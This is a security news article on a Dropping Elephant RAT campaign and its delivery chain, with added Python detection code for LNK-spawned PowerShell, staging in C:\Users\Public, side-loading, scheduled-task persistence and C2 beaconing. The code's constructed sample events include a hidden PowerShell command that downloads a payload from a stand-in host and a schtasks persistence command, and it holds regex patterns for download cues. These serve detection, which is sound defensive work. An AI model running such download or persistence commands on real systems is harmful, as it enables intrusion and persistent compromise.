The threat actor known as Dropping Elephant has re-emerged with a significantly upgraded malware operation, leveraging a China-themed lure document and a sophisticated remote access trojan (RAT) designed to evade modern security controls.
Researchers at Rapid7 uncovered the latest Dropping Elephant RAT campaign during a proactive threat-hunting engagement and found that while the group’s core tradecraft remains recognizable, the underlying malware framework has undergone substantial refinement.
The campaign combines malicious shortcut files, PowerShell-based delivery, DLL side-loading, in-memory payload execution, and advanced anti-analysis techniques to provide attackers with persistent access while minimizing forensic visibility.
Key Details
The attack begins with a malicious Windows shortcut file named GRES3001.lnk, disguised as a PDF document associated with an industrial energy contract.
When opened, the shortcut silently executes an embedded PowerShell downloader while presenting the victim with a legitimate-looking decoy document related to a GRES-3 seawater pump contract.
Behind the scenes, the PowerShell script contacts a staging server hosted at chinagreenenergy[.]org, where additional malware components are retrieved.
Rapid7 researchers were able to obtain the entire malware toolkit because the staging infrastructure remained active during their investigation.
Their analysis identified multiple indicators linking the operation directly to previous Dropping Elephant campaigns, including:
- Similar delivery mechanisms
- Consistent screenshot collection behavior
- Familiar command-and-control communication patterns
- Reused command-handler architecture
- Comparable beaconing logic
The findings suggest the group has evolved its malware capabilities without abandoning its established operational methodology.
Technical Analysis
One of the most notable aspects of the campaign is its sophisticated multi-stage execution chain.
After the initial PowerShell downloader runs, several files are staged within the C:\Users\Public directory.
Among them is a legitimate Microsoft executable named Fondue.exe, which is abused to perform DLL side-loading.
The attack chain unfolds as follows:
Stage 1: DLL Side-Loading
Fondue.exe loads a malicious DLL disguised as APPWIZ.cpl.
Because the executable is signed and trusted, this technique helps the attackers bypass certain security controls and blend into normal system activity.
Stage 2: Payload Decryption
The malicious DLL decrypts an encrypted file named editor.dat and passes the resulting payload to a Donut shellcode loader.
Stage 3: In-Memory Execution
The Donut loader maps the final RAT directly into memory.
Unlike conventional malware that writes executable files to disk, this approach leaves a significantly smaller forensic footprint and reduces the likelihood of detection by traditional antivirus solutions.
Once active, the malware performs extensive host reconnaissance before establishing encrypted communications with its command-and-control (C2) infrastructure hosted at gcl-power[.]org over HTTPS on port 443.
The RAT beacons to its operators every 10 seconds and supports:
- Remote command execution
- File uploads
- File downloads
- Directory enumeration
- Screenshot capture
- Host reconnaissance
Together, these capabilities provide attackers with complete operational control over infected systems.
Impact and Risks
The campaign presents significant risks for organizations across both public and private sectors.
Because the RAT operates entirely in memory and employs multiple layers of evasion, infected systems may remain compromised for extended periods without triggering traditional endpoint alerts.
Potential impacts include:
- Long-term unauthorized access
- Sensitive data theft
- Credential harvesting
- Internal reconnaissance
- Lateral movement
- Deployment of additional malware
- Espionage operations
- Follow-on ransomware activity
The malware’s ability to collect screenshots and execute arbitrary commands provides operators with real-time visibility into victim environments, increasing the risk of targeted data exfiltration and operational disruption.
Organizations that rely heavily on signature-based detection methods may struggle to identify infections before substantial damage occurs.
Expert Recommendations
Rapid7 advises defenders to focus on behavioral detection rather than relying solely on indicators of compromise (IOCs).
Because filenames, hashes, and infrastructure can change rapidly between campaigns, defenders should prioritize identifying suspicious activity patterns.
Monitor Shortcut-to-PowerShell Execution
Investigate instances where:
- LNK files spawn PowerShell
- PowerShell downloads content from external domains
- Hidden PowerShell execution occurs
Hunt for Public Directory Staging
Monitor for suspicious files being written to:
C:\Users\Public\
Particularly when executable content, DLLs, or encrypted payloads appear unexpectedly.
Detect Suspicious Scheduled Tasks
A key detection opportunity involves the scheduled task:
GoogleErrorReport
Security teams should immediately investigate systems where this task launches executables from non-standard Windows directories.
Strengthen Endpoint Detection
Organizations should ensure their endpoint detection and response (EDR) platforms can identify:
- Memory-resident malware
- DLL side-loading activity
- AMSI bypass attempts
- ETW tampering
- PowerShell abuse
- Process injection techniques
Review Logging and Telemetry
Enable detailed logging for:
- PowerShell execution
- Scheduled task creation
- Process creation events
- DLL loading activity
- Outbound HTTPS connections
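With that telemetry enabled, the host-side hunts above (shortcut-launched hidden PowerShell, payload content written under C:\Users\Public, an unsigned module loaded out of that directory, and schtasks.exe creating GoogleErrorReport) can be expressed as simple rules over process-creation, file-creation and image-load events. The following Python is an added example, not Rapid7's detection content or code from the report; the Sysmon-like event schema, the sample command lines and the staging.example URL are assumptions, and the events are constructed.

```python
# Host-telemetry hunt rules for the behaviours described in the article, run over
# constructed Sysmon-style events. Added example, not Rapid7's detection content;
# the event schema, sample command lines and the staging.example URL are assumptions.
import re
from dataclasses import dataclass

PUBLIC_DIR = r"c:\users\public"  # user-writable staging directory named in the report
PAYLOAD_EXT = (".exe", ".dll", ".cpl", ".dat", ".ps1")
HIDDEN_CUE = re.compile(r"-w(?:indowstyle)?\s+hid", re.I)
DOWNLOAD_CUE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)


@dataclass
class Event:
    """Minimal Sysmon-like record: 1 = process create, 7 = image load, 11 = file create."""
    event_id: int
    image: str = ""          # process image path
    parent_image: str = ""
    command_line: str = ""
    target_file: str = ""    # event 11: file written
    image_loaded: str = ""   # event 7: module loaded
    module_signed: bool = True


def rule_lnk_powershell(ev):
    # A double-clicked .lnk runs its target under explorer.exe; hidden PowerShell
    # with a download cue under that parent matches the GRES3001.lnk delivery pattern.
    if ev.event_id != 1 or not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    if not ev.parent_image.lower().endswith("explorer.exe"):
        return None
    if HIDDEN_CUE.search(ev.command_line) and DOWNLOAD_CUE.search(ev.command_line):
        return "explorer-spawned hidden PowerShell with download cue"
    return None


def rule_public_staging(ev):
    # Executable, DLL/CPL or encrypted-payload content written under C:\Users\Public.
    path = ev.target_file.lower()
    if ev.event_id == 11 and path.startswith(PUBLIC_DIR) and path.endswith(PAYLOAD_EXT):
        return f"payload staged in Public: {ev.target_file}"
    return None


def rule_sideload(ev):
    # Any process loading an unsigned DLL/CPL out of the Public directory
    # (the report's Fondue.exe loading APPWIZ.cpl from C:\Users\Public).
    mod = ev.image_loaded.lower()
    if (ev.event_id == 7 and mod.startswith(PUBLIC_DIR)
            and mod.endswith((".dll", ".cpl")) and not ev.module_signed):
        return f"unsigned module side-loaded from Public by {ev.image}"
    return None


def rule_schtask(ev):
    # schtasks.exe creating GoogleErrorReport, or any task whose action lives in Public.
    cl = ev.command_line.lower()
    if (ev.event_id == 1 and ev.image.lower().endswith("schtasks.exe")
            and "/create" in cl and ("googleerrorreport" in cl or PUBLIC_DIR in cl)):
        return "scheduled-task persistence: " + ev.command_line
    return None


RULES = (rule_lnk_powershell, rule_public_staging, rule_sideload, rule_schtask)


def scan(events):
    """Return (rule name, finding) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events: the first four mirror the reported chain, the last two are benign.
SAMPLE_EVENTS = [
    Event(1, image=PS, parent_image=r"C:\Windows\explorer.exe",
          command_line=r'powershell -w hidden -c "iwr http://staging.example/p -OutFile C:\Users\Public\editor.dat"'),
    Event(11, image=PS, target_file=r"C:\Users\Public\APPWIZ.cpl"),
    Event(7, image=r"C:\Users\Public\Fondue.exe",
          image_loaded=r"C:\Users\Public\APPWIZ.cpl", module_signed=False),
    Event(1, image=r"C:\Windows\System32\schtasks.exe", parent_image=r"C:\Users\Public\Fondue.exe",
          command_line=r'schtasks /create /sc minute /mo 1 /tn GoogleErrorReport /tr "C:\Users\Public\Fondue.exe" /f'),
    Event(1, image=PS, parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r"powershell -File C:\Scripts\backup.ps1"),
    Event(11, image=r"C:\Windows\explorer.exe", target_file=r"C:\Users\Public\Documents\notes.txt"),
]

if __name__ == "__main__":
    for name, msg in scan(SAMPLE_EVENTS):
        print(f"[{name}] {msg}")
```

Each rule keys on a behaviour rather than a hash, so renamed files or a new staging domain still trip it; the two benign events (an administrator's scheduled script launched from cmd.exe and a text file saved to Public) fall through, which is the false-positive check worth keeping when tuning the rules against real telemetry.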
Implement Network Monitoring
Monitor for beaconing patterns and unusual outbound communications to newly registered or suspicious infrastructure.
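A RAT that checks in every 10 seconds leaves a measurable signature even inside encrypted HTTPS: the gaps between successive connections from one host to one destination are almost constant. The following Python is an added example, not code from the report; it parses constructed outbound-connection log lines, groups them by source and destination, and flags pairs whose inter-connection gaps are tightly regular. The log format, the RFC 5737 addresses and the thresholds are assumptions.

```python
# Periodicity hunt for C2 beaconing over outbound-connection logs.
# Added example; the log format, addresses and thresholds are assumptions.
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, median, pstdev

LINE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+)$")


def parse(lines):
    """Turn 'TIMESTAMP src=IP dst=IP:PORT' lines into (src, dst, epoch_seconds) tuples."""
    conns = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # tolerate unrelated lines in the same feed
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00")).timestamp()
        conns.append((m["src"], m["dst"], ts))
    return conns


def beacon_candidates(conns, min_gaps=8, max_cv=0.1):
    """Flag (src, dst) pairs whose connection gaps are tightly regular.

    cv = stdev/mean of the gaps: a sleep-driven beacon with little jitter sits
    near 0, interactive browsing is far above max_cv. Both thresholds are
    assumptions to tune per environment.
    """
    by_pair = defaultdict(list)
    for src, dst, ts in conns:
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), times in by_pair.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        if len(gaps) < min_gaps:
            continue  # too few samples to call anything periodic
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg > 0 else float("inf")
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "count": len(times),
                             "period_s": round(median(gaps), 2), "cv": round(cv, 3)})
    return findings


def _lines(src, dst, offsets):
    # Build constructed log lines at the given second offsets from a fixed start time.
    t0 = datetime(2024, 1, 1, 12, 0, tzinfo=timezone.utc)
    return [f"{(t0 + timedelta(seconds=o)).isoformat().replace('+00:00', 'Z')} src={src} dst={dst}"
            for o in offsets]


JITTER = [0.0, 0.1, -0.1, 0.2, 0.0, -0.2, 0.1, 0.0, -0.1, 0.2, -0.1, 0.0]
SAMPLE_LOG = (
    # constructed: a 10-second beacon with sub-second jitter ...
    _lines("10.0.0.5", "203.0.113.10:443", [10 * i + j for i, j in enumerate(JITTER)])
    # ... and a host browsing an unrelated site at irregular intervals
    + _lines("10.0.0.7", "198.51.100.5:443", [0, 3, 45, 47, 120, 121.5, 300, 305, 600, 602, 900, 1500])
)

if __name__ == "__main__":
    for f in beacon_candidates(parse(SAMPLE_LOG)):
        print(f"beacon candidate {f['src']} -> {f['dst']}: period {f['period_s']}s, cv {f['cv']}")
```

The coefficient of variation rather than the raw period is the discriminator, so the same check catches a 10-second beacon and a 5-minute one; enrich any candidate with destination age and reputation before escalating, since software update checks and monitoring agents are also periodic.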
Industry Context
The campaign reflects a broader trend toward stealth-focused malware frameworks that prioritize memory-only execution and defense evasion.
Threat actors increasingly rely on techniques such as:
- In-memory payload delivery
- DLL side-loading
- Living-off-the-land binaries (LOLBins)
- AMSI bypasses
- ETW suppression
- Encrypted command-and-control traffic
These methods are designed to undermine traditional security tooling and complicate both automated detection and manual incident response.
The use of Donut shellcode loaders, runtime API resolution, and control-flow flattening further demonstrates how modern threat actors are investing in anti-analysis capabilities traditionally associated with advanced persistent threat (APT) operations.
As endpoint protection technologies improve, attackers continue shifting toward behavioral evasion rather than relying solely on malware obfuscation.
Conclusion
Rapid7’s discovery of the latest Dropping Elephant operation highlights how established threat actors continue evolving their toolsets to stay ahead of defenders. By combining malicious shortcut files, PowerShell delivery, DLL side-loading, in-memory RAT execution, and extensive anti-analysis protections, the group has built a malware framework capable of maintaining persistent and stealthy access to victim environments.
For defenders, the campaign serves as a reminder that behavioral monitoring, threat hunting, and memory-focused detection capabilities are increasingly essential as attackers move beyond traditional file-based malware techniques.
FAQ
Who is Dropping Elephant?
Dropping Elephant is a long-tracked cyber threat actor known for conducting targeted malware campaigns that often use social engineering lures, remote access trojans, and stealth-focused persistence techniques.
What is the primary malware used in this campaign?
The campaign deploys a custom remote access trojan (RAT) that executes entirely in memory and provides attackers with full remote control of compromised systems.
Why is in-memory malware dangerous?
In-memory malware avoids writing its final payload to disk, making it more difficult for traditional antivirus and file-scanning tools to detect.
What is the GoogleErrorReport scheduled task?
GoogleErrorReport is a malicious persistence mechanism created by the malware. It launches the compromised execution chain every minute to maintain access after system reboots or interruptions.
How can organizations detect this campaign?
Defenders should monitor for PowerShell launched by shortcut files, suspicious scheduled tasks, DLL side-loading behavior, AMSI tampering, ETW patching, and files staged in the C:\Users\Public directory.